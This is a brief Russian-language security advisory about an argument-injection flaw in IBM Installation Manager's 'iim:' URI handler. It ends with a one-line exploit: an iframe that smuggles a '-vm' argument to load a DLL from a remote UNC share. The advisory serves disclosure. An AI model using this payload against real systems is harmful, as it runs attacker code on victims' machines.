Программа: IBM Installation Manager 1.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в
IBMIM.exe при обработке аргументов, полученных через "iim:" URI. Атакующий может
использовать "-vm" аргумент для загрузки произвольной библиотеки с сетевого
ресурса, что приведет к выполнению произвольного кода.

Эксплоит:

<iframe src='iim://"%20-vm%20\\192.168.0.1\uncshare\sh.dll%20-url%20"'></iframe>



Оставить мнение